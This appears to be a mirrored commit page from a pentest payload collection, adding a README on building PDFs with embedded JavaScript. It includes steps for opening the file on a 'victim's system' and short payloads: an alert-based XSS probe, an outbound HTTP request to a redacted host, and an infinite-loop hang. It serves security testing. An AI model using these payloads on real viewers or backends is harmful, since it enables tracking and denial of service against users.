ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add documentation for PDF JS PoC

Browse Source
This commit is contained in:
Mat 2023-03-07 17:10:23 +01:00 committed by GitHub
parent e43f1527c0
commit 5817de1fb2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
Upload Insecure Files/Extension PDF JS/README.md Normal file
View File

@ -0,0 +1,44 @@
# Generate PDF File Containing JavaScript Code
PDF may contain JavaScript code.
This script allow us to generate a PDF file which helps us to check if that code is executed when the file is opened.
Possible targets are client applications trying to open the file or sererside backends which are parsing the PDF file.
## HowTo
1. Edit the file `poc.js` with the JS code you want to have included in your PDF file
2. Install the required python modules using `pip install pdfrw`
3. Create the PDF: `python poc.py poc.js`
4. Open the file `result.pdf` on your victim's system
## Possible exploit codes
The full set of available functions is documented here: https://opensource.adobe.com/dc-acrobat-sdk-docs/library/jsapiref/JS_API_AcroJS.html
### XSS (for GUI viewers)
```js
app.alert("XSS");
```
### Open URL
```js
var cURL="http://[REDACTED]/";
var params =
{
cVerb: "GET",
cURL: cURL
};
Net.HTTP.request(params);
```
### Timeout
```js
while (true) {}
```
## References
The code is based on https://github.com/osnr/horrifying-pdf-experiments/